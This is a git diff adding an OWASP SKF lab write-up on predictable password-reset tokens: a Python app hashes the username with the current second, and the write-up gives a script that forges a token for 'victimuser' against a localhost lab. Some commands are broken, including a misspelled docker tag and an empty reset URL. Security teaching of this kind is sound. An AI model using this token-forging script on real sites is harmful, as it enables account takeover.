diff --git a/md/Python/insecure-random.md b/md/Python/insecure-random.md new file mode 100644 index 0000000000..d3395c17f9 --- /dev/null +++ b/md/Python/insecure-random.md @@ -0,0 +1,134 @@ +# KBID xxx - Insecure Random + +## Running the app + +```text +$ sudo docker pull blabla1337/owasp-skf-lab:threatmodeling +``` + +```text +$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:theatmodeling +``` + +{% hint style="success" %} +Now that the app is running let's go hacking! +{% endhint %} + +## Running the app Python3 + +First, make sure python3 and pip are installed on your host machine. +After installation, we go to the folder of the lab we want to practise +"i.e /skf-labs/XSS/, /skf-labs/jwt-secret/ " and run the following commands: + +``` +$ pip3 install -r requirements.txt +``` + +``` +$ python3 +``` + +{% hint style="success" %} +Now that the app is running let's go hacking! +{% endhint %} + +## Reconnaissance + +### Step1 + +The first step is to understand how the password reset functionality works. +We identify that there is a /forget endpoint that serves the password reset page. + +![](../../.gitbook/assets/tm-1.png) + +```text +http://localhost:5000/forget +``` + +### Step2 + +Submit a username to the password reset form to generate a reset token. + +![](../../.gitbook/assets/tm-2.png) + +```text +http://localhost:5000/passwordForget +``` + +### Step3 + +Observe that the reset token is generated using the current timestamp and the username. The token generation logic is as follows: + +```python +current_time = datetime.datetime.now() +timestamp = current_time.second +to_hash = values[0][1] + str(timestamp) +resetToken = hashlib.sha1(to_hash.encode('utf-8')).hexdigest() +``` + +### Step4 + +We can exploit this logic by generating the token ourselves. First, get the current time and username. Then, use the same logic to create a token. + +```Python +import hashlib +import datetime + +username = 'testuser' +current_time = datetime.datetime.now() +timestamp = current_time.second +to_hash = username + str(timestamp) +resetToken = hashlib.sha1(to_hash.encode('utf-8')).hexdigest() +print(resetToken) +``` + +### Step5 + +Use the generated token to reset the password by navigating to the following URL: + +```text +http://localhost:5000/reset// +``` + +## Exploitation + +Now that we understand the vulnerability, we can use it to reset any user's password by generating a valid token and navigating to the reset link. + +### Step1 + +Create a script to automate token generation and password reset. + + +```python +import requests +import hashlib +import datetime + +username = 'victimuser' +current_time = datetime.datetime.now() +timestamp = current_time.second +to_hash = username + str(timestamp) +resetToken = hashlib.sha1(to_hash.encode('utf-8')).hexdigest() + +reset_url = f'http://localhost:5000/reset/{username}/{resetToken}' +response = requests.get(reset_url) + +if response.status_code == 200: + print('Token is valid, proceeding to reset password...') +else: + print('Token is invalid, try again.') +``` + +#### Step 2 + +Use the generated link to reset the password and Voila We made it! + +## Additional sources + +Please refer to the OWASP testing guide for a complete description of password reset vulnerabilities and edge cases over different platforms! + +[https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities) + +SQLite Reference + +[https://www.techonthenet.com/sqlite/sys_tables/index.php](https://www.techonthenet.com/sqlite/sys_tables/index.php)